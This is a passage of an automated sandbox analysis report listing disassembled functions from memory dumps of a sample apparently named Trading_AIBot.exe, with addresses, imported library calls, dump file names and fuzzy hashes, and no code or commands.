Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Analysis Process: Trading_AIBot.exePID: 2920, Parent PID: 6480COMMON

Executed Functions

Function 021C767A Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

Jdq, xrefs: 021C7611

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID: Jdq
API String ID: 0-1891755625
Opcode ID: 011f3c1ce60ed323d5a9496acee76d9ddc1f448774136cddeaa23e4b598c2eb4
Instruction ID: 8a69c423890cd1b2992afd42d4314eec489c474e2db0d7aa44137dd8a2b95642
Opcode Fuzzy Hash: 011f3c1ce60ed323d5a9496acee76d9ddc1f448774136cddeaa23e4b598c2eb4
Instruction Fuzzy Hash: 34711474D40218CFCB14EFA4D990AADBBB6FF89300F209569D409BB264DB316D8ACF40

Function 021C7FBC Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 609706b5a36e9eb70be0148c30d444048d6bcc350aaf86efcb906fa9ed754ddb
Instruction ID: af474543fa62899c0a524d350f1383ba6805375eb6c9910306cbf493a17dec84
Opcode Fuzzy Hash: 609706b5a36e9eb70be0148c30d444048d6bcc350aaf86efcb906fa9ed754ddb
Instruction Fuzzy Hash: ED51F0B4D40248DFDF14DFE8D584AAEFBB6AF58310F20802AE415BB290CB759946CF54

Function 021C7E5F Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75f71fb652cc68b6408d946c90a4a234da9f5bfcd015ed9ca6203060560f79bc
Instruction ID: 0db2d5a34721b4d97e037b5c2f694db17a43aea77aece55eb655aa721363eb23
Opcode Fuzzy Hash: 75f71fb652cc68b6408d946c90a4a234da9f5bfcd015ed9ca6203060560f79bc
Instruction Fuzzy Hash: 7341EAB4D00248DFDB04DFEAC984A9EFBBAAF59310F24802AE418BB250D7749946CF44

Function 021C7E60 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0252a0a2d53454a6dfb7ffdcd0e7aa25d9ce4206cac1747079a443e3cc11e5f0
Instruction ID: 608246bc76ed502c3d4fc0b13d8fcd0884a2433a568686b735722316d82a01f1
Opcode Fuzzy Hash: 0252a0a2d53454a6dfb7ffdcd0e7aa25d9ce4206cac1747079a443e3cc11e5f0
Instruction Fuzzy Hash: 0941EBB4D00248DFDB04DFEAC984A9EFBBABF59310F24802AE418BB250D7749946CF44

Function 021C74F2 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

Jdq, xrefs: 021C7611

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID: Jdq
API String ID: 0-1891755625
Opcode ID: 75e08f1cc6fa6f905db68e255585bd4a87796b12edca7b60a3dfc29c1c9f6889
Instruction ID: 71d0c7a35ba79af9d4c13361c46a095ba955e06ef6b3f20785ce07d27828c299
Opcode Fuzzy Hash: 75e08f1cc6fa6f905db68e255585bd4a87796b12edca7b60a3dfc29c1c9f6889
Instruction Fuzzy Hash: 50410574E412089FDB04DFA8D894AEEBBF2FF89301F10806AE515B72A0DB359945CF91

Function 021C5354 Relevance: .9, Instructions: 936COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41cd5da16632cd1e4aa6908f01b446d86eee1aae020e74b5a10c669e99e3ea93
Instruction ID: bee1a250824211534f461173e659c0b19ac09c37402836435ae8451fa91054cf
Opcode Fuzzy Hash: 41cd5da16632cd1e4aa6908f01b446d86eee1aae020e74b5a10c669e99e3ea93
Instruction Fuzzy Hash: 69B2E174A41229DFCB65EF64C894B9EB7B2BF49304F2085E9D40DA7265DB319E81CF40

Function 021C5358 Relevance: .9, Instructions: 935COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b85b890d1a7f02c58da5ee42827319daf213adda61e612bcf581bf60391b60e
Instruction ID: f356e5e92d6be3f430fddf2e88cdad229d39937ae1b938750b4e9d42d87ab014
Opcode Fuzzy Hash: 6b85b890d1a7f02c58da5ee42827319daf213adda61e612bcf581bf60391b60e
Instruction Fuzzy Hash: 2BB2E074A41229DFCB65EF64C894B9EB7B2BF49304F2085E9D40DA7265DB319E81CF40

Function 021C0839 Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd257916b2b3f9ee9ec46d12a30e9ac59337da547b649e100a535b28e674ba8
Instruction ID: 5e0d8ac43a5bcca180131fd50a91ba6cc1a8c6096c8d5d606b1bc60d42855edf
Opcode Fuzzy Hash: 1fd257916b2b3f9ee9ec46d12a30e9ac59337da547b649e100a535b28e674ba8
Instruction Fuzzy Hash: 1962CC74A01229DFCB65DF64D994B9EBBB2FF49300F1080AAD40AA7365DB319E85CF40

Function 021C0848 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e7e3711d76a7fa2ae2ec1b0ace6692fbaaacf7255a9d8cfedfe6ef7df47d823
Instruction ID: 5ebfbaf1e0622e811593dce86547e15ad6f1bad8cdc8bc243710184fd884977a
Opcode Fuzzy Hash: 0e7e3711d76a7fa2ae2ec1b0ace6692fbaaacf7255a9d8cfedfe6ef7df47d823
Instruction Fuzzy Hash: BC62CC74A01229DFDB69DF64D994B9EBBB2FF49300F1081A9D40AA7364DB319E85CF40

Function 021C7A79 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c5f82a21e67045584dfd35ba31063457c7aaa9e0b5cf8251ea67271e0a9fc9
Instruction ID: 5a1eb652d04609515e97acb386e4699d9b252de6b260c2df22ec59bbf1156fce
Opcode Fuzzy Hash: 37c5f82a21e67045584dfd35ba31063457c7aaa9e0b5cf8251ea67271e0a9fc9
Instruction Fuzzy Hash: 5C41C1B4D40248DFDB14DFA9C584AAEFFF5AF59300F24846AE444AB290D7745986CF50

Function 021C67E0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b68d309fe5598836a493d5aab4150a8f53e9b5d0365a35fc4cb1206f6814371
Instruction ID: 722ac4765f1f4270dee270f4a4f85cbc805e417d7aa8c15f716ebd765844adc1
Opcode Fuzzy Hash: 2b68d309fe5598836a493d5aab4150a8f53e9b5d0365a35fc4cb1206f6814371
Instruction Fuzzy Hash: FCB1BD78A01228CFDB64DF68C984B9EB7B6BB49304F1085EAD40DA7351DB31AE85CF51

Function 021C7178 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c5eabe4bd29a9d6b76632cc921ed68c3efba547a3d61120cc4eb64833883cfe
Instruction ID: a4faa6e0a47400775610ea34d072fdf1cca989d995a845c6d7a130230472e857
Opcode Fuzzy Hash: 7c5eabe4bd29a9d6b76632cc921ed68c3efba547a3d61120cc4eb64833883cfe
Instruction Fuzzy Hash: 6251C278A40248CFCB48DFA9D99499DBBF6FF49310F209159E816AB365DB31AC06CF14

Function 021C65B0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66554816c16a404ab5710a859f6b4814a35870022b3c99526900c5d9f7bdb291
Instruction ID: 42a5699f2e4a1a247986baa2208aea0a05a6efbc64af70891e09bd5b2da56454
Opcode Fuzzy Hash: 66554816c16a404ab5710a859f6b4814a35870022b3c99526900c5d9f7bdb291
Instruction Fuzzy Hash: 2651EC78D40358DFCB04EFA9D4946EDBBF5BF59304F20842AD42AAB2A1DB345946CF40

Function 021C7D10 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4779a09b1ddf198c28fec277e07db67db746929169bb4a757ac98da53bd6bfae
Instruction ID: 73bd0103afd6ace3f006e044fad84e9b05d2f58414de2006ae20b3e5d65a6cc5
Opcode Fuzzy Hash: 4779a09b1ddf198c28fec277e07db67db746929169bb4a757ac98da53bd6bfae
Instruction Fuzzy Hash: 4141CEB4D002489FDB14DFEAC584AAEFFF5AF58310F24802AE418AB290DB745986CF50

Function 021C73A0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975f1f85faade657bcb7c9d375b393cd6b2ca1fc44ee9b4b19781360b08da4f8
Instruction ID: fc37aaf1d015d797b510c114c7ce53a539e18e874fe313f57932973bbc7425d2
Opcode Fuzzy Hash: 975f1f85faade657bcb7c9d375b393cd6b2ca1fc44ee9b4b19781360b08da4f8
Instruction Fuzzy Hash: 7E31C174E40209DFCB09DBB4D590AEEB7B2AF89304F2094AAD415B73A0CB366D41CF65

Function 021C73B0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67901cd3152d48af916055ef09a0297c9974504e4f06f7a67165ebad19f40ed0
Instruction ID: 9ad8520ff40d2ebe631c6d19833fcaa0f87a9529d9507b9a155c7195eb5c5c27
Opcode Fuzzy Hash: 67901cd3152d48af916055ef09a0297c9974504e4f06f7a67165ebad19f40ed0
Instruction Fuzzy Hash: 0321E274E40209DFCB08DBA5C490AEEB7B2EF89304F20946AD415B7390CB366D41CF65

Function 021C51F7 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a44b5cacf2c4d02c234d8834ec518aadd7591c5d00a787a216d2e078ee83b1f
Instruction ID: 92b45eca4721df90822dfa6c8732cc0dd5b0607678a315fae3e638fdb62f6dd9
Opcode Fuzzy Hash: 1a44b5cacf2c4d02c234d8834ec518aadd7591c5d00a787a216d2e078ee83b1f
Instruction Fuzzy Hash: 5521BB70C09385DFCB06AFB4D8587AEBFB1EF06309F15489EC082A71A2DB781645DB81

Function 021C5238 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a950e7a60efdc957e9a309777edf6aed9ac81e3f31cef1661b2c035983c84ac
Instruction ID: 62d175c2be89f4c1d5f39a0b7fd28dab4c91d9cc43b3683a609f719df76918d3
Opcode Fuzzy Hash: 5a950e7a60efdc957e9a309777edf6aed9ac81e3f31cef1661b2c035983c84ac
Instruction Fuzzy Hash: 4B01BC74C54209DFDB04EFB4C41CBAEBBF0EB05305F5089A98012B3290D7780644DF90

Function 021C7E54 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e1e35a587a996ca9b54b89709ea49beed74d3a1df1dc420433a43b7250c26a
Instruction ID: 1a3e32afd19962c1ba42664b2a78e972ca050c0c33b7a7abb61effe76e653a5e
Opcode Fuzzy Hash: 46e1e35a587a996ca9b54b89709ea49beed74d3a1df1dc420433a43b7250c26a
Instruction Fuzzy Hash: 860175B9D402588EDB11EFA4C4987AEFFB5AB24310F20444CD001AB291CBB94882CF50

Function 021C6C3E Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 296a1c9e7fa9d37ef5fac44b2a362b13353d9740dbf03d3ebe83991548c31b00
Instruction ID: 536054543322c9deadb01fb65328cbf5233ab3f6ba8f2e9321c0d1cc5c4f5699
Opcode Fuzzy Hash: 296a1c9e7fa9d37ef5fac44b2a362b13353d9740dbf03d3ebe83991548c31b00
Instruction Fuzzy Hash: 23F08CB8D10196CFCB24DFA4D448BACBBB0EF5A312F1064AAD009B3220CB309982CF14

Function 021C7499 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef2389d40ad31fd5d177eb918f602611475ddc51167cf231a55fbeca6bb0ecb0
Instruction ID: dd31e0a33a12a19ac89af831334adcb46c06b40a882a5ba0a8ae44f8fdba83a3
Opcode Fuzzy Hash: ef2389d40ad31fd5d177eb918f602611475ddc51167cf231a55fbeca6bb0ecb0
Instruction Fuzzy Hash: B9F082B4914204DFC701EF68D954958BFB0FB4A311F1001EAD844DB3A1EB318D41CB41

Function 021C6757 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c389e7ad65dce245dbea9127fb1c399e0aa01fdeb38d048ea5a5942103a7be34
Instruction ID: bcc791bd8982b27e31f09ec31a7e159075c17e1518db18bc573e7001c65f9d01
Opcode Fuzzy Hash: c389e7ad65dce245dbea9127fb1c399e0aa01fdeb38d048ea5a5942103a7be34
Instruction Fuzzy Hash: 17E02230944189CFC709EF20EA65AACBB34EF15301F408BDED40627162DB362F04DB41

Function 021C74A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26086177e3979abd9912d26b0446bd4dedf742a64f2dc4edda1f68e59da1778c
Instruction ID: b539c25003d154aff97c087715aa4af09870fdd418f2be996172955fe0799278
Opcode Fuzzy Hash: 26086177e3979abd9912d26b0446bd4dedf742a64f2dc4edda1f68e59da1778c
Instruction Fuzzy Hash: 1BE01AB8E10208DFC744EF68E988A59BBB4FB09311F1041A9D80893365E7319D45CB80

Function 021C6768 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a8d6f8583049a3f1a6c21658f525500455d872bdadcf288db9a9aeb863bded0
Instruction ID: 5b006c9e159492a39adb18f76b8646b999de627c9e285b8210c1c88c0d759db8
Opcode Fuzzy Hash: 9a8d6f8583049a3f1a6c21658f525500455d872bdadcf288db9a9aeb863bded0
Instruction Fuzzy Hash: C3E08670941108EFD701EFB4EA05A9DB7BDEB44314F508A69D405A3211EB366E14DB80

Function 021C7642 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab97ccb6d42306eacd5717170fa668c0c749aab7c3f798baefc924a444fff363
Instruction ID: 2d8b4b273f9c94d432826805019988ddb49c64e543ff4ac4938cbb4b9de5caba
Opcode Fuzzy Hash: ab97ccb6d42306eacd5717170fa668c0c749aab7c3f798baefc924a444fff363
Instruction Fuzzy Hash: 29E0C23088D2548FC301AFA49804E94BF74DF07326F0001DDD0644B1A2EB314810D791

Function 021C6D40 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0cc1237bd33d98d96f7c82448b5afb8bc7afe55629430a3108f93bf99f0b21c
Instruction ID: 7a4732781b8e2712915bff16bf356cbe7b2edb41c7f5b1e0c81514fd6ee2fbdb
Opcode Fuzzy Hash: a0cc1237bd33d98d96f7c82448b5afb8bc7afe55629430a3108f93bf99f0b21c
Instruction Fuzzy Hash: 43D05B3045A2814FC7195B656959EA0BB34DB07315F010BCAD0A5071B2D7654855D756

Function 021C7650 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
